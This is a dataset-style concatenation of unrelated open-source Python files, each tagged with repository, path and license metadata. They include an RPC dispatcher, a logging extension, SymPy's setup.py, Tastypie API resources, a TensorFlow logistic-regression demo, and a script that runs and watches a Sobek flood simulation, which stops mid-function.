logger.error("Exception thrown while processing response\nRemote " + traceback.format_exc())
return Response(request.id, exception, None)
else:
return Response(request.id, None, value)
@trace_function
def _process_response(self, response):
with self._lock:
event = self._pending.pop(response.id, None)
if hasattr(event, 'set'):
self._pending[response.id] = response
event.set()
class Proxy(object):
@trace_function
def __init__(self, dispatcher, proxy_id, exposed):
self._dispatcher = dispatcher
self._proxy_id = proxy_id
self._exposed = exposed
for name in exposed:
func = functools.partial(self._callmethod, name)
func.__name__ = name
setattr(self, name, func)
@trace_function
def _callmethod(self, name, *args, **kwargs):
return self._dispatcher.call(name, args, kwargs, proxy_id=self._proxy_id)
@trace_function
def __del__(self):
self._dispatcher.call('#del_proxy', (self._proxy_id,), wait=False)
|
ekarulf/pymp
|
src/pymp/dispatcher.py
|
Python
|
mit
| 11,009
|
"""
:copyright: (c) 2011 Local Projects, all rights reserved
:license: Affero GNU GPL v3, see LICENSE for more details.
"""
"""
Extend the standard log module to enable some more detailed debug information.
"""
import os
import logging
import __main__
import logging.handlers
from config import Config
# Attempt to import lib from web, but not necessary
try:
from lib import web
except ImportError:
pass
class Info():
"""
Class to help extend logging functionality
"""
def __getitem__(self, name):
"""
Override get item to format IP addresses better, specifically add padding.
"""
if name == 'ip':
try:
ip = web.ctx.ip
if ip is None:
ip = "No IP Address"
except (AttributeError, NameError):
ip = "X.X.X.X"
ip = "%s%s" % (ip, ''.join(' ' for i in range(15 - len(ip))))
return ip
return self.__dict__.get(name, "?")
def __iter__(self):
"""
Override iter method to add the ip attribute
"""
keys = ['ip']
keys.extend(self.__dict__.keys())
return keys.__iter__()
# Set formatter for logging
formatter = logging.Formatter("%(asctime)s %(ip)s |%(levelname)s| %(message)s <%(filename)s:%(lineno)d>")
# Log identifier/file will be the same as the file being run
name = os.path.basename(__main__.__file__).split('.')[0]
log = logging.getLogger(name)
# Set log level to Debug (TODO: This should be pulled from config file)
log.setLevel(logging.DEBUG)
logfile = Config.get('logfile') # %s/../logs/%s.log' % (os.path.dirname(os.path.realpath(__file__)), name)
fh = logging.handlers.TimedRotatingFileHandler(logfile, 'midnight')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
log.addHandler(fh)
# Extend log module with Info class defined above.
log = logging.LoggerAdapter(log, Info())
|
codeforamerica/Change-By-Us
|
framework/log.py
|
Python
|
agpl-3.0
| 2,004
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import mrp_production_sequence
|
sysadminmatmoz/odoo-clearcorp
|
TODO-7.0/mrp_production_sequence/__init__.py
|
Python
|
agpl-3.0
| 1,061
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pkgutil
import pkg_resources
from raven import Client
def get_modules():
resolved = {}
modules = [mod[1] for mod in tuple(pkgutil.iter_modules())]
for module in modules:
try:
res_mod = pkg_resources.get_distribution(module)
if res_mod is not None:
resolved[module] = res_mod.version
except pkg_resources.DistributionNotFound:
pass
return resolved
class SentryErrorHandler(object):
def __init__(self, config):
self.config = config
if self.config.USE_SENTRY:
self.sentry = Client(self.config.SENTRY_DSN_URL)
self.modules = get_modules()
def handle_exception(self, typ, value, tb, extra={}):
if self.config.USE_SENTRY:
self.sentry.captureException(
(typ, value, tb),
extra=extra,
data={
'modules': self.modules
}
)
|
holmes-app/holmes-api
|
holmes/error_handlers/sentry.py
|
Python
|
mit
| 1,015
|
#!/usr/bin/env python
"""Distutils based setup script for SymPy.
This uses Distutils (http://python.org/sigs/distutils-sig/) the standard
python mechanism for installing packages. Optionally, you can use
Setuptools (http://pythonhosted.org/setuptools/setuptools.html) to automatically
handle dependencies. For the easiest installation
just type the command (you'll probably need root privileges for that):
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure read the output of:
python setup.py --help install
In addition, there are some other commands:
python setup.py clean -> will clean all trash (*.pyc and stuff)
python setup.py test -> will run the complete test suite
python setup.py bench -> will run the complete benchmark suite
python setup.py audit -> will run pyflakes checker on source code
To get a full list of avaiable commands, read the output of:
python setup.py --help-commands
Or, if all else fails, feel free to write to the sympy list at
sympy@googlegroups.com and ask for help.
"""
import sys
import subprocess
import os
import shutil
import glob
mpmath_version = '0.19'
# This directory
dir_setup = os.path.dirname(os.path.realpath(__file__))
try:
from setuptools import setup, Command
except ImportError:
from distutils.core import setup, Command
# handle mpmath deps in the hard way:
from distutils.version import LooseVersion
try:
import mpmath
if mpmath.__version__ < LooseVersion(mpmath_version):
raise ImportError
except ImportError:
print("Please install the mpmath package with a version >= %s" % mpmath_version)
sys.exit(-1)
PY3 = sys.version_info[0] > 2
# Make sure I have the right Python version.
if sys.version_info[:2] < (2, 7):
print("SymPy requires Python 2.7 or newer. Python %d.%d detected" % sys.version_info[:2])
sys.exit(-1)
# Check that this list is uptodate against the result of the command:
# python bin/generate_module_list.py
modules = [
'sympy.assumptions',
'sympy.assumptions.handlers',
'sympy.benchmarks',
'sympy.calculus',
'sympy.categories',
'sympy.codegen',
'sympy.combinatorics',
'sympy.concrete',
'sympy.core',
'sympy.core.benchmarks',
'sympy.crypto',
'sympy.deprecated',
'sympy.diffgeom',
'sympy.external',
'sympy.functions',
'sympy.functions.combinatorial',
'sympy.functions.elementary',
'sympy.functions.elementary.benchmarks',
'sympy.functions.special',
'sympy.functions.special.benchmarks',
'sympy.geometry',
'sympy.holonomic',
'sympy.integrals',
'sympy.integrals.benchmarks',
'sympy.interactive',
'sympy.liealgebras',
'sympy.logic',
'sympy.logic.algorithms',
'sympy.logic.utilities',
'sympy.matrices',
'sympy.matrices.benchmarks',
'sympy.matrices.expressions',
'sympy.ntheory',
'sympy.parsing',
'sympy.physics',
'sympy.physics.continuum_mechanics',
'sympy.physics.hep',
'sympy.physics.mechanics',
'sympy.physics.optics',
'sympy.physics.quantum',
'sympy.physics.unitsystems',
'sympy.physics.unitsystems.systems',
'sympy.physics.vector',
'sympy.plotting',
'sympy.plotting.intervalmath',
'sympy.plotting.pygletplot',
'sympy.polys',
'sympy.polys.agca',
'sympy.polys.benchmarks',
'sympy.polys.domains',
'sympy.printing',
'sympy.printing.pretty',
'sympy.sandbox',
'sympy.series',
'sympy.series.benchmarks',
'sympy.sets',
'sympy.simplify',
'sympy.solvers',
'sympy.solvers.benchmarks',
'sympy.stats',
'sympy.strategies',
'sympy.strategies.branch',
'sympy.tensor',
'sympy.tensor.array',
'sympy.unify',
'sympy.utilities',
'sympy.utilities.mathml',
'sympy.vector',
]
class audit(Command):
"""Audits SymPy's source code for following issues:
- Names which are used but not defined or used before they are defined.
- Names which are redefined without having been used.
"""
description = "Audit SymPy source with PyFlakes"
user_options = []
def initialize_options(self):
self.all = None
def finalize_options(self):
pass
def run(self):
import os
try:
import pyflakes.scripts.pyflakes as flakes
except ImportError:
print("In order to run the audit, you need to have PyFlakes installed.")
sys.exit(-1)
dirs = (os.path.join(*d) for d in (m.split('.') for m in modules))
warns = 0
for dir in dirs:
for filename in os.listdir(dir):
if filename.endswith('.py') and filename != '__init__.py':
warns += flakes.checkPath(os.path.join(dir, filename))
if warns > 0:
print("Audit finished with total %d warnings" % warns)
class clean(Command):
"""Cleans *.pyc and debian trashs, so you should get the same copy as
is in the VCS.
"""
description = "remove build files"
user_options = [("all", "a", "the same")]
def initialize_options(self):
self.all = None
def finalize_options(self):
pass
def run(self):
curr_dir = os.getcwd()
for root, dirs, files in os.walk(dir_setup):
for file in files:
if file.endswith('.pyc') and os.path.isfile:
os.remove(os.path.join(root, file))
os.chdir(dir_setup)
names = ["python-build-stamp-2.4", "MANIFEST", "build", "dist", "doc/_build", "sample.tex"]
for f in names:
if os.path.isfile(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
for name in glob.glob(os.path.join(dir_setup, "doc", "src", "modules", \
"physics", "vector", "*.pdf")):
if os.path.isfile(name):
os.remove(name)
os.chdir(curr_dir)
class test_sympy(Command):
"""Runs all tests under the sympy/ folder
"""
description = "run all tests and doctests; also see bin/test and bin/doctest"
user_options = [] # distutils complains if this is not here.
def __init__(self, *args):
self.args = args[0] # so we can pass it to other classes
Command.__init__(self, *args)
def initialize_options(self): # distutils wants this
pass
def finalize_options(self): # this too
pass
def run(self):
from sympy.utilities import runtests
runtests.run_all_tests()
class run_benchmarks(Command):
"""Runs all SymPy benchmarks"""
description = "run all benchmarks"
user_options = [] # distutils complains if this is not here.
def __init__(self, *args):
self.args = args[0] # so we can pass it to other classes
Command.__init__(self, *args)
def initialize_options(self): # distutils wants this
pass
def finalize_options(self): # this too
pass
# we use py.test like architecture:
#
# o collector -- collects benchmarks
# o runner -- executes benchmarks
# o presenter -- displays benchmarks results
#
# this is done in sympy.utilities.benchmarking on top of py.test
def run(self):
from sympy.utilities import benchmarking
benchmarking.main(['sympy'])
# Check that this list is uptodate against the result of the command:
# python bin/generate_test_list.py
tests = [
'sympy.assumptions.tests',
'sympy.calculus.tests',
'sympy.categories.tests',
'sympy.codegen.tests',
'sympy.combinatorics.tests',
'sympy.concrete.tests',
'sympy.core.tests',
'sympy.crypto.tests',
'sympy.deprecated.tests',
'sympy.diffgeom.tests',
'sympy.external.tests',
'sympy.functions.combinatorial.tests',
'sympy.functions.elementary.tests',
'sympy.functions.special.tests',
'sympy.geometry.tests',
'sympy.holonomic.tests',
'sympy.integrals.tests',
'sympy.interactive.tests',
'sympy.liealgebras.tests',
'sympy.logic.tests',
'sympy.matrices.expressions.tests',
'sympy.matrices.tests',
'sympy.ntheory.tests',
'sympy.parsing.tests',
'sympy.physics.continuum_mechanics.tests',
'sympy.physics.hep.tests',
'sympy.physics.mechanics.tests',
'sympy.physics.optics.tests',
'sympy.physics.quantum.tests',
'sympy.physics.tests',
'sympy.physics.unitsystems.tests',
'sympy.physics.vector.tests',
'sympy.plotting.intervalmath.tests',
'sympy.plotting.pygletplot.tests',
'sympy.plotting.tests',
'sympy.polys.agca.tests',
'sympy.polys.domains.tests',
'sympy.polys.tests',
'sympy.printing.pretty.tests',
'sympy.printing.tests',
'sympy.sandbox.tests',
'sympy.series.tests',
'sympy.sets.tests',
'sympy.simplify.tests',
'sympy.solvers.tests',
'sympy.stats.tests',
'sympy.strategies.branch.tests',
'sympy.strategies.tests',
'sympy.tensor.array.tests',
'sympy.tensor.tests',
'sympy.unify.tests',
'sympy.utilities.tests',
'sympy.vector.tests',
]
long_description = '''SymPy is a Python library for symbolic mathematics. It aims
to become a full-featured computer algebra system (CAS) while keeping the code
as simple as possible in order to be comprehensible and easily extensible.
SymPy is written entirely in Python.'''
with open(os.path.join(dir_setup, 'sympy', 'release.py')) as f:
# Defines __version__
exec(f.read())
with open(os.path.join(dir_setup, 'sympy', '__init__.py')) as f:
long_description = f.read().split('"""')[1]
if __name__ == '__main__':
setup(name='sympy',
version=__version__,
description='Computer algebra system (CAS) in Python',
long_description=long_description,
author='SymPy development team',
author_email='sympy@googlegroups.com',
license='BSD',
keywords="Math CAS",
url='http://sympy.org',
packages=['sympy'] + modules + tests,
scripts=['bin/isympy'],
ext_modules=[],
package_data={
'sympy.utilities.mathml': ['data/*.xsl'],
'sympy.logic.benchmarks': ['input/*.cnf'],
},
data_files=[('share/man/man1', ['doc/man/isympy.1'])],
cmdclass={'test': test_sympy,
'bench': run_benchmarks,
'clean': clean,
'audit': audit},
classifiers=[
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Physics',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=['mpmath>=%s' % mpmath_version]
)
|
postvakje/sympy
|
setup.py
|
Python
|
bsd-3-clause
| 11,430
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
from openerp.tools.translate import _
class vehicle_category(orm.Model):
"""Vehicle Category"""
_description = _(__doc__)
_name = 'vehicle.category'
_columns = {
'name': fields.char('Name', required=True, select=True,
help='Name of motor vehicle category.'),
}
|
houssine78/vertical-travel-porting-v8-wip
|
motor_vehicle/vehicle_category.py
|
Python
|
agpl-3.0
| 1,375
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 30 16:04:08 2017
@author: 오연택
"""
import tensorflow as tf
import numpy as np
xy = np.loadtxt('train.txt', unpack=True, dtype='float32')
x_data = xy[0:-1]
y_data = xy[-1]
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_uniform([1, len(x_data)], -1.0, 1.0))
# Out hypothesis
h = tf.matmul(W,X)
hypothesis = tf.div(1., 1.+tf.exp(-h))
#cost function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) * tf.log(1 - hypothesis))
#Minimize
a = tf.Variable(0.1) # learning rate, alpha
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost) # goal is minimize cost
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
for step in range(2001):
sess.run(train, feed_dict={X: x_data, Y: y_data})
if step % 20 == 0:
print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))
print("------------------------------------------------------------------")
print(sess.run(hypothesis, feed_dict={X:[[1], [2], [2]]})>0.5)
print(sess.run(hypothesis, feed_dict={X:[[1], [5], [5]]})>0.5)
print(sess.run(hypothesis, feed_dict={X:[[1,1], [4,3], [3,5]]})>0.5)
|
yeontaek/Basic-of-Tensorflow
|
04.Logistic Classification/01.logistic_classification.py
|
Python
|
apache-2.0
| 1,237
|
import pdb
import logging
import sys
from tastypie import fields, http
from tastypie.resources import ModelResource
from tastypie.authentication import ApiKeyAuthentication, Authentication, SessionAuthentication, MultiAuthentication
from tastypie.exceptions import NotFound
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.contrib.contenttypes.fields import GenericForeignKeyField
from tastypie.utils import trailing_slash
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db.models import Max, Count
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.conf.urls import url
from django.contrib.contenttypes.models import ContentType
from core.permissions import StoryAuthorization, PieceAuthorization, ActivityAuthorization
from core.paginator import StoryPaginator
from core.models import RemoteObject, Story, Piece, Activity, StoryUserAccess, StoryGroupAccess
from accounts.views import register_by_access_token
from accounts.models import BanyanUser, BanyanUserNotifications
from accounts.api import BanyanUserResource
from accounts.permissions import BanyanUserNotificationsAuthorization
from content_feedback.models import HiddenObject
from access_groups.models import PublicGroupDesc
# Get an instance of a logger
logger = logging.getLogger(__name__)
class RemoteObjectResource(ModelResource):
author = fields.ForeignKey('accounts.api.BanyanUserResource', 'author', full=True)
perma_link = fields.CharField(readonly = True)
class Meta:
always_return_data = True
abstract = True
ordering = ['timeStamp']
def dehydrate_media(self, bundle):
return bundle.obj.media
def dehydrate_location(self, bundle):
return bundle.obj.location
class StoryResource(RemoteObjectResource):
permission = fields.DictField(null=False, blank=False, readonly=True)
pieces = fields.ToManyField('core.api.PieceResource',
attribute="pieces",
full=True, null=True, blank=True, readonly=True)
stats = fields.DictField(null=True, blank=True, readonly = True)
class Meta(RemoteObjectResource.Meta):
queryset = Story.objects.select_related()
authentication = MultiAuthentication(ApiKeyAuthentication(), SessionAuthentication(), Authentication())
authorization = StoryAuthorization()
paginator_class = StoryPaginator
def get_object_list(self, request):
story_queryset = Story.objects.none()
if request.user.is_authenticated():
story_queryset = request.user.stories.all()
cache_key = '%s:%s' % (str(request.user.id), HiddenObject.HIDDEN_STORIES_ID_LIST_CACHE_KEY)
hidden_stories_id_list = cache.get(cache_key)
if hidden_stories_id_list is None:
ctype = ContentType.objects.get(app_label="core", model="story")
hidden_stories_qs = HiddenObject.objects.filter(content_type = ctype, user = request.user)
hidden_stories_id_list = hidden_stories_qs.values_list('object_id', flat=True)
cache.set(cache_key, hidden_stories_id_list, None) # timeout forever
remaining_stories_qs = story_queryset.exclude(pk__in = hidden_stories_id_list)
return remaining_stories_qs
else:
public_groupdesc, created = PublicGroupDesc.objects.get_or_create()
publicgroup = public_groupdesc.group()
story_queryset = publicgroup.stories.all()
return story_queryset
def dehydrate_pieces(self, bundle):
piece_bundles = bundle.data.get("pieces")
user = bundle.request.user
# pieces is an array
for piece_bundle in piece_bundles:
#if this content should not be returned, don't return it
if piece_bundle.obj.is_flagged(user):
piece_bundles.remove(piece_bundle)
return piece_bundles
def dehydrate_permission(self, bundle):
story = bundle.obj
user = bundle.request.user
if user.is_authenticated():
try:
storyuseraccess = StoryUserAccess.objects.get(story=story, user=user)
return storyuseraccess.api_dict()
except StoryUserAccess.DoesNotExist:
return {"canRead":False, "canWrite":False, "isInvited":False}
else:
public_groupdesc, created = PublicGroupDesc.objects.get_or_create()
publicgroup = public_groupdesc.group()
if (StoryGroupAccess.objects.filter(story=story, group=publicgroup).exists()):
return {"canRead":True, "canWrite":False, "isInvited":False}
else:
return {"canRead":False, "canWrite":False, "isInvited":False}
def dehydrate_writeAccess(self, bundle):
return bundle.obj.writeAccess
def dehydrate_readAccess(self, bundle):
return bundle.obj.readAccess
def dehydrate_perma_link(self, bundle):
storyId = bundle.obj.bnObjectId
link = reverse("story_short", args=(storyId,))
return bundle.request.build_absolute_uri(link)
def dehydrate_stats(self, bundle):
# Get the queryset first so that it can be cached
all_activities = bundle.obj.activities.all()
numViews = all_activities.filter(type=Activity.VIEW).count()
followActivityUri = None
if bundle.request.user.is_authenticated():
user_activities = all_activities.filter(user = bundle.request.user)
userViewed = user_activities.filter(type=Activity.VIEW).count() > 0
try:
activity = user_activities.get(type=Activity.FOLLOW_STORY)
activityResource = ActivityResource()
followActivityUri = activityResource.get_resource_uri(activity)
except Activity.DoesNotExist:
followActivityUri = None
except:
logger.error("core.api.dehydrate_stats {}{}".format(sys.exc_info()[0], sys.exc_info()[1]))
pass
else:
userViewed = False
return {"numViews":numViews, "userViewed":userViewed, "followActivity":followActivityUri}
class PieceResource(RemoteObjectResource):
story = fields.ForeignKey(StoryResource, 'story')
stats = fields.DictField(null=True, blank=True, readonly = True)
class Meta(RemoteObjectResource.Meta):
queryset = Piece.objects.select_related()
authentication = MultiAuthentication(ApiKeyAuthentication(), Authentication())
authorization = PieceAuthorization()
filtering = {
'story': ALL_WITH_RELATIONS,
'user': ALL_WITH_RELATIONS,
'timeStamp': ['exact', 'gt', 'gte', 'lt', 'lte', 'range']
}
def prepend_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/like%s$" % (self._meta.resource_name, trailing_slash()), self.wrap_view('get_piece_likes'), name="api_get_piece_likes"),
]
def get_piece_likes(self, request, **kwargs):
pk = kwargs['pk']
try:
bundle = self.build_bundle(data={'pk': pk}, request=request)
obj = self.cached_obj_get(bundle=bundle, **self.remove_api_resource_names(kwargs))
except ObjectDoesNotExist:
return http.HttpGone()
except MultipleObjectsReturned:
return http.HttpMultipleChoices("More than one resource is found at this URI.")
activities_resource = ActivityResource()
return activities_resource.get_list(request, object_id = pk, content_type = ContentType.objects.get_for_model(bundle.obj), type='like')
def dehydrate_perma_link(self, bundle):
pieceId = bundle.obj.bnObjectId
link = reverse("piece_short", args=(pieceId,))
return bundle.request.build_absolute_uri(link)
def dehydrate_stats(self, bundle):
# Get the queryset first so that it can be cached
all_activities = bundle.obj.activities.all()
numViews = all_activities.filter(type=Activity.VIEW).count()
numLikes = all_activities.filter(type=Activity.LIKE).count()
likeActivityUri = None
if bundle.request.user.is_authenticated():
user_activities = all_activities.filter(user = bundle.request.user)
userViewed = user_activities.filter(type=Activity.VIEW).count() > 0
try:
activity = user_activities.get(type=Activity.LIKE)
activityResource = ActivityResource()
likeActivityUri = activityResource.get_resource_uri(activity)
except Activity.DoesNotExist:
likeActivity = None
except:
logger.error("core.api.dehydrate_stats {}{}".format(sys.exc_info()[0], sys.exc_info()[1]))
pass
else:
userViewed = False
return {"numViews":numViews, "userViewed":userViewed, "numLikes":numLikes, "likeActivity":likeActivityUri}
class ActivityResource(ModelResource):
user = fields.ForeignKey(BanyanUserResource, 'user', full=True)
content_object = GenericForeignKeyField({
Story: StoryResource,
Piece: PieceResource,
BanyanUser: BanyanUserResource,
}, 'content_object')
class Meta:
always_return_data = True
queryset = Activity.objects.all()
authentication = MultiAuthentication(ApiKeyAuthentication(), SessionAuthentication(), Authentication())
authorization = ActivityAuthorization()
filtering = {
'object_id': ALL_WITH_RELATIONS,
'content_type': ALL_WITH_RELATIONS,
'user': ALL_WITH_RELATIONS,
'type': ['exact']
}
def hydrate_user(self, bundle):
if bundle.request.user.is_authenticated():
bundle.data['user'] = bundle.request.user
return bundle
'''
This should ideally be in accounts.api. However moving it here since there is
a cyclic dependency which doesn't seem to get resolved.
banyan.url: from core.api import StoryResource, PieceResource, ActivityResource ->
core.api: from accounts.api import BanyanUserResource ->
accounts.api: class BanyanUserNotificationsResource(ModelResource) ->
core.api: import StoryResource, PieceResource
'''
class BanyanUserNotificationsResource(ModelResource):
user = fields.ForeignKey('accounts.api.BanyanUserResource', 'user')
from_user = fields.ForeignKey('accounts.api.BanyanUserResource', 'from_user', null=True, blank=True)
content_object = GenericForeignKeyField({
Story: StoryResource,
Piece: PieceResource,
BanyanUser: BanyanUserResource,
}, 'content_object', null = True, blank = True)
class Meta:
queryset = BanyanUserNotifications.objects.all()
resource_name = 'notifications'
list_allowed_methods = []
detail_allowed_methods = ['get']
authentication = ApiKeyAuthentication() #Only from the devices
authorization = BanyanUserNotificationsAuthorization()
filtering = {
'user': ALL_WITH_RELATIONS,
}
|
asm-products/banyan-web
|
core/api.py
|
Python
|
agpl-3.0
| 11,423
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (division, print_function, absolute_import, unicode_literals)
from .sampler import *
from .interruptible_pool import InterruptiblePool
from .mpi_pool import MPIPool
from . import util
__version__ = '1.0.0'
|
willvousden/ptemcee
|
ptemcee/__init__.py
|
Python
|
mit
| 278
|
# Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from wlauto.common.resources import FileResource
class ReventFile(FileResource):
name = 'revent'
def __init__(self, owner, stage):
super(ReventFile, self).__init__(owner)
self.stage = stage
class JarFile(FileResource):
name = 'jar'
class ApkFile(FileResource):
name = 'apk'
|
freedomtan/workload-automation
|
wlauto/common/android/resources.py
|
Python
|
apache-2.0
| 903
|
from __future__ import print_function, division
from PyQt4 import QtGui, uic
from clas12_wiremap import initialize_session, dc_fill_tables, dc_find_connections
class Trial(QtGui.QWidget):
def __init__(self,parent=None):
super(QtGui.QWidget, self).__init__(parent)
uic.loadUi('Trial.ui',self)
self.updating = False
self.session = initialize_session()
def update_parameters(self):
if not self.updating:
self.updating = True
#slot called in qt designer
def button_changed(self):
for board in [2,3]:
#loop over things to get
print(board,":",self.get_button(board))
#the actual getting of each element
def get_button(self, board):
return getattr(self, 'SB' + str(board))
class MainWindow(QtGui.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.central_widget = QtGui.QWidget(self)
self.setCentralWidget(self.central_widget)
hbox = QtGui.QHBoxLayout()
self.trial = Trial()
hbox.addWidget(self.trial)
hbox.addStretch(1)
vbox = QtGui.QVBoxLayout(self.central_widget)
vbox.addLayout(hbox)
vbox.addStretch(1)
self.show()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
main_window = MainWindow()
sys.exit(app.exec_())
|
theodoregoetz/clas12-dc-wiremap
|
scratch/Trial3.py
|
Python
|
gpl-3.0
| 1,431
|
#!c:/python25/python.exe
# -*- coding: utf-8 -*-
#***********************************************************************
#*
#***********************************************************************
#* All rights reserved **
#*
#*
#* **
#*
#*
#*
#***********************************************************************
#* Library : <if this is a module, what is its name>
#* Purpose : task 130: spawn and watch sobek.simulate.
#* Function : main
#* Usage : spawnsobek.py --help
#*
#* Project : J0005
#*
#* $Id$
#*
#* $Name: $
#*
#* initial programmer : Mario Frasca
#* initial date : <yyyymmdd>
#* changed by : Alexandr Seleznev
#* changed at : 20120601
#* changes : integration with django, pylint, pep8
#**********************************************************************
__revision__ = "$Rev$"[6:-2]
"""this script executes simulate.exe and watches it until it ends or
times out. please refer to LizardKadebreukRekencentrumSobekUitvoeren
for more details.
"""
import time
import os # used throughout the code...
import logging
import subprocess
import threading
import re
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',)
log = logging.getLogger('nens')
from flooding_lib.models import Scenario, ResultType
from flooding_base.models import Setting
from django import db
from zipfile import ZipFile, ZIP_DEFLATED
default_sobek_locations = {
'v2.09': 'sobek209/',
'v2.10': 'sobek210/',
'v2.11': 'sobek211/',
'v2.12': 'sobek212/',
}
def kill(pid):
"""kill function for Win32
returns the return code of TerminateProcess or
None in case of any failure"""
try:
import win32api
handle = win32api.OpenProcess(1, False, pid)
result = win32api.TerminateProcess(handle, -1)
win32api.CloseHandle(handle)
except:
result = None
pass
return result
def watchdog(child, cmtwork_dir):
"""keep running until the simulate program has written to the
PLUVIUS1.rtn file, then kill the subprocess in case it's still
running. does not return a value and does not check whether the
computation was successful. here we are only interested in
terminating the subprocess when the computation is completed.
"""
log.debug('inside watchdog cmtwork_dir %s, %s' % (type(cmtwork_dir), cmtwork_dir))
# keep ignoring code 51 while warming up. warming up ends as soon
# as a different code appears or after 20 seconds.
warming_up = 20
file_to_monitor = os.path.join(cmtwork_dir, 'PLUVIUS1.rtn')
last_stat = None
text = ' 51\nstill warming up'
while True:
try:
if warming_up:
warming_up -= 1
curr_stat = os.stat(file_to_monitor)
if curr_stat != last_stat:
# file changed
log.debug("file changed")
# reading it may cause an exception if 'simulate' is
# still writing to the file. no problem: we will
# check at next step.
input = open(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'))
text = input.readlines()
input.close()
log.debug("%s" % text)
# the assignment is at the end, so that it's not
# performed in case of an exception.
last_stat = curr_stat
# test the status code on the first line
result_code = int(text[0])
if result_code != 51:
warming_up = 0
if result_code == 51 and warming_up:
raise Exception("still warming up")
if result_code != 0:
log.warning('de berekening is met een fout beeindigd.')
break
# hij is of aan het rekenen of is hij klaar en de
# berekening is gelukt.
if text[1].find("Simulation finished succesfully"):
log.info('de berekening lijkt (succesvol) afgelopen.')
break
# hij is nog aan het rekenen...
except Exception, e:
# er is een fout opgetreden. bijvoorbeeld: het bestand
# kon niet worden geopend, of het heeft niet voldoende
# regels, of het is niet in het juiste formaat, in elk
# geval ik negeer alle fouten in de hoop dat het bij een
# volgende ronde wel lukt.
log.debug("error in watchdog: (%s)..." % e)
pass
# keep the sleep time low, because threads can't be killed and
# the main thread will be waiting for the watchdog. a too
# high sleep time will slow down exiting on completion
log.debug('watchdog is about to go to sleep again')
time.sleep(1)
if child.poll() is not None:
log.debug('watchdog thinks child already died')
return
log.debug("watchdog thinks the child ended but will kill it to make sure.")
if kill(child.pid) is not None:
log.debug("it was a good idea to kill the child.")
output = open(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'), "w")
output.write(" 51\nSimulation interrupted by spawning script\n\n")
output.close()
def alarm_handler(timeout, child):
count = 0
while count < timeout:
time.sleep(1)
count += 1
if child.poll() is not None:
log.debug('alarm_handler thinks child already died')
return
log.debug("alarm_handler is about to kill the child")
kill(child.pid)
def set_broker_logging_handler(broker_handler=None):
"""
"""
if broker_handler is not None:
log.addHandler(broker_handler)
else:
log.warning("Broker logging handler does not set.")
def perform_sobek_simulation(scenario_id,
sobek_project_directory,
sobek_program_root,
project_name='lizardkb',
timeout=288000):
"""task 130: perform_sobek_simulation
"""
log.debug("step 0a: get settings")
log.debug("sobek_project_directory: %s" % sobek_project_directory)
log.debug("sobek_program_root: %s" % sobek_program_root)
scenario = Scenario.objects.get(pk=scenario_id)
sobek_location = os.path.join(
sobek_program_root,
default_sobek_locations[scenario.sobekmodel_inundation.sobekversion.name[:5]])
#sobek_location = [d for d in sobek_location.split('/') if d]
log.debug("sobek_location: %s" % sobek_location)
destination_dir = Setting.objects.get(key='DESTINATION_DIR').value
source_dir = Setting.objects.get(key='SOURCE_DIR').value
